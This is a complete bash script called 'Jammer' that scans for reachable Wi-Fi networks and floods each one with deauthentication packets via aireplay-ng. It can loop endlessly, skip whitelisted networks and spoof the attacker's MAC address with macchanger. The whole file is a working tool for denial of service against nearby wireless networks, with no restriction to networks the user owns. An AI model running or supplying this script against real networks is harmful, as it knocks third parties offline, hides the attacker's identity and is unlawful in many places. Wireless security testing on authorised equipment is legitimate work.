#!/bin/bash

# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE

# Current Version
version="v0.6"

# Default name for the Wireless interface
wint="wlan0"
wint_set=0

# base name for scan files
name=jam-scan

# temp file name
temp_name=$(mktemp "${name}-XXX")

# default DeAuth times for each MAC address
deauth_number=5

# try to change macs with macchanger
change_macs=0

# yes to all variable
yes_to_all=0

# if 1, do not delete the files at the end
keep_scan_files=0

# decide if the program is an endless loop
endless=0

# an array of files to white-list
white_list=

# some colors
RED='\e[0;31m'
GREEN='\e[0;32m'
BROWN='\e[0;33m'
BOLD='\e[1m'
NC='\e[0m'

# prompt
prompt="${BOLD}jam!${NC} "

# print the first argument in a prompt + newline
printlnp() {
    printf "${prompt}%s\n" "$1"
}

# print the first argument in red
printred() {
    printf "${RED}%s${NC}" "$1"
}

# print the first argument in red
printgreen() {
    printf "${GREEN}%s${NC}" "$1"
}

printbrown() {
    printf "${BROWN}%s${NC}" "$1"
}

# print prompt + message in red + newline
printlnpr() {
    printlnp "$(printred "$1")"
}

# print prompt + message in green + newline
printlnpg() {
    printlnp "$(printgreen "$1")"
}

printlnpbr() {
    printlnp "$(printbrown "$1")"
}

printintro() {
    echo
    echo "Jammer $version"
    echo
}

# check for the right permissions
check_perm() {
    if [[ $EUID != 0 ]]; then
      printlnpr "oops! You need root privileges for this."
      exit 0
    fi
}

# check if any of the required commands is missing
check_dep() {
    for command in airmon-ng macchanger iwlist awk; do
      if [[ -z $(which $command) ]]; then
        printlnpr "'$command' was not found"
        printlnpr "consider installing it from the repositories of your distribution"
        exit 0
      fi
    done
    printlnpg "All dependencies are met, moving on."
}

# check if argument is number
check_number() {
    # regex for is-number check
    local re='^[0-9]+$'
    if [[ ! ($1 =~ $re) ]]; then
        printlnpr "Wrong argument format. Exiting."
        exit 0
    fi
    return 1
}

# check if array contains element
whitelist_contains_element() {
    local seeking="$1"
    for element in "${white_list[@]}"; do
        element=$( echo "${element}" | sed -e 's/^ *//' -e 's/ *$//' );
        [[ "$element" == "$seeking" ]] && echo "found"
    done 
}

# change the MAC of wireless interface
change_mac_inter() {
    if [[ $change_macs -eq 1 ]]; then
        # Change mac address and initiate monitor mode
        printlnp "Changing MAC for Wireless Interface"
        ifconfig $wint down
        sleep 1
        macchanger -A $wint
        sleep 1
        ifconfig $wint up
    fi   
}

# reset the MACs and settings and remove files created
cleanup_and_reset() {
    airmon-ng stop ${wint}mon
    if [[ $change_macs -eq 1 ]]; then
        ifconfig $wint down
        sleep 1
        macchanger -p $wint
        sleep 1
        ifconfig $wint up
    fi
    if [[ keep_scan_files -eq 0 ]]; then
        printf "${prompt}Cleaning up the created files . . .\n"
        rm -f ${temp_name}
        rm -f $name-01.csv
        rm -f $name-01.cap
        rm -f $name-01.kismet.csv
        rm -f $name-01.kismet.netxml
    fi
    ifconfig "$wint" up
    service network-manager restart
    service avahi-daemon restart
    printf "${prompt}Done. Exiting.\n"
}

# a warning before the attack starts
warn_before_attack() {
    printlnpg "DONE FINDING TARGETS"
    sleep 0.5
    printlnpr "THE ATTACK WILL START IN 5 SECONDS"
    sleep 0.5
    printlnpg "IF YOU WANT TO ABORT DO IT NOW"
    sleep 4.5
}

prepare_air() {
    if [[ $(airmon-ng check | tail -n +6 | tr [:blank:] -) ]]; then
        service network-manager stop
        service avahi-daemon stop
        # two times in succession seems to work well 
        airmon-ng check kill > /dev/null 2>&1
        airmon-ng check kill > /dev/null 2>&1
    fi
    airmon-ng start $wint
}

# if the default interface has not changed, warn the user
warn_about_interface() {
    if [[ "$wint_set" -eq 0 ]]; then
        printlnpbr "the default interface has not been changed"
        printlnpbr "The detected interfaces are: "
        airmon-ng | sed '/^$/d' | awk '{print $2}' | tail -n +2
        printlnpbr "The default is **$wint**"
        printlnpbr "If they do not match, cancel the scan and use -w to set it"
        if [[ yes_to_all -eq 0 ]]; then
            printlnpbr "Waiting 8 seconds to make up your mind"
            sleep 8
        fi
        printlnpbr "Continuing ..."
    fi
}

# prints the help message
show_help() {
    echo
    echo "Usage: jammer [OPTION] ... "
    echo "Jam Wifi Networks that Your Wireless Card can Reach."
    echo
    printgreen "-d, --deauths"
    printf "\t\t: Set the number of deauthentications for each station (default ${deauth_number})\n"
    printgreen "-y, --yes"
    printf "\t\t: Make 'Yes' the answer for everything the script asks\n"
    printgreen "-s, --endless"
    printf "\t\t: When reaching the end of the list, start again\n"
    printgreen "-f, --whitelist"
    printf "\t\t: A file with ESSID's to ignore during the attack\n"
    printgreen "-k, --keep"
    printf "\t\t: Keep the scan files after the script ends\n"
    printgreen "-n, --name"
    printf "\t\t: Choose the names the scan files are saved as\n"
    printgreen "-w, --wireless"
    printf "\t\t: Set the name for the wireless interface. Default is 'wlan0'\n"
    printgreen "--spoof-mac"
    printf "\t\t: Try to change MACs using macchanger\n"
    printgreen "-h, --help"
    printf "\t\t: Show this help message\n"
    echo
    echo
}

scan_area() {
    # adjusted from this amazing stackoverflow answer
    # https://stackoverflow.com/questions/25394772/parsing-iwlist-scan-using-bash
    if iwlist $wint scanning |
        while IFS= read -r line; do
            [[ "$line" =~ Address ]] && bssid=${line##*ss: }
            [[ "$line" =~ \(Channel ]] && { channel=${line##*nel }; channel=${channel:0:$((${#channel}-1))}; }
            [[ "$line" =~ ESSID ]] && {
                essid=${line##*ID:}
                [[ -z $(whitelist_contains_element "$essid") ]] && echo "${bssid};${channel};${essid}"
            }
        done > ${temp_name};
    then
        echo "Something went wrong, retrying"
        sleep 5
        scan_area
    fi
}

# deauthenticate given @inputs: essid, bssid, channel
deauth() {
    # regex for is-number check
    local re='^[0-9]+$'
    declare essid="$1" bssid="$2" channel="$3"
    if [[ "$channel" =~ $re ]]; then
        echo -e ${prompt}Targeting:${RED} "$essid" ${NC} with BSSID: "$bssid" @ ${GREEN}Channel "$channel" ${NC}
        sleep 3
        iwconfig ${wint}mon channel "$channel"
        aireplay-ng -0 $deauth_number -a "$bssid" ${wint}mon
    fi
}

# Read the file, line by line and de-auth each MAC
read_file_and_deauth() {
    warn_before_attack 
    while read -r line
    do
        read bssid channel essid <<< $(echo $line | awk -F";" '{print $1 " " $2 " " $3}')
        deauth "$essid" "$bssid" "$channel"
    done < ${temp_name}
}

# starts attack, if endless is 1, goes on forever
main_attack() {
    read_file_and_deauth
    if [[ endless -eq 1 ]]; then
        main_attack
    else exit 0
    fi
}

# a function to print the detected stations from the file
show_detected_stations() {
    printlnp "Detected Stations are:"
    awk -F";" '{print NR,$3}' ${temp_name}
    printf "\n\n"
}

# parse the options if there are any
parse_options() {
  while [[ $# > 0 ]]
  do
  key="$1"
  case $key in
      -d|--deauths)
          deauth_number="$2"
          check_number $deauth_number
          printlnpg "Setting deauth number to $deauth_number"
          shift
      ;;
      --spoof-mac)
          change_macs=1
          printlnpg "I will try to change your macs"
      ;;
      -y|--yes)
          yes_to_all=1
          printlnpg "Setting YES as the answer to everything"
      ;;
      -s|--endless)
          endless=1
          printlnpg "Setting mode to Endless"
      ;;
      -f|--whitelist)
          readarray white_list < "$2"
          printlnpg "Trying to whitelist the ESSID's in the file $2"
          shift
      ;;
      -k|--keep)
          keep_scan_files=1
          printlnpg "Scan files will be kept"
      ;;
      -n|--name)
          name="$2"
          printlnpg "Setting scan file names to $name"
          shift
      ;;
      -w|--wireless)
          wint="$2"
          wint_set=1
          printlnpg "Setting wireless interface name to $wint"
          shift
      ;;
      -h|--help)
          show_help
          exit 0
      ;;
      *)
          printlnpr "Unknown option '$1'"
          show_help
          printlnpr "Exiting."
          exit 0
      ;;
  esac
  # go to the next argument
  shift
  done
}

# print name and welcome message
printintro

# parse options
parse_options "$@"

# check permissions
check_perm

# check dependencies
check_dep

# trap to clean the files and reset at the end
trap cleanup_and_reset EXIT

# change directory to the place the script is executed from
cd "$(dirname "$0")"

# warn if the interface was not updated
warn_about_interface

# decide if the MAC will be changed
change_mac_inter

# show the station names that are in the whitelist
if [ ${#white_list[@]} -ne 0 ]; then
    printlnp "White-listed stations: "
    echo "${white_list[@]}" | sed -e 's/^ *//' -e 's/ *$//'
fi

printlnpg "Scanning the area for active stations"

# execute scan and save the discovered MAC addresses and channels to a file
scan_area

# show the stations the scan discovered
show_detected_stations

# check if the user wants no interaction
if [[ $yes_to_all -eq 1 ]]; then
    main_attack
    exit 0
fi
# else ask the user
printf "${prompt}Scan is completed. Start jamming? [Y/n] "
read answer_start
case $answer_start in
        [Nn] | [Nn][Oo] )
            printf "${prompt}${RED}Aborted.\n${NC}"
            exit 0
        ;;
        *)
            prepare_air
            main_attack
            exit 0
        ;;
esac
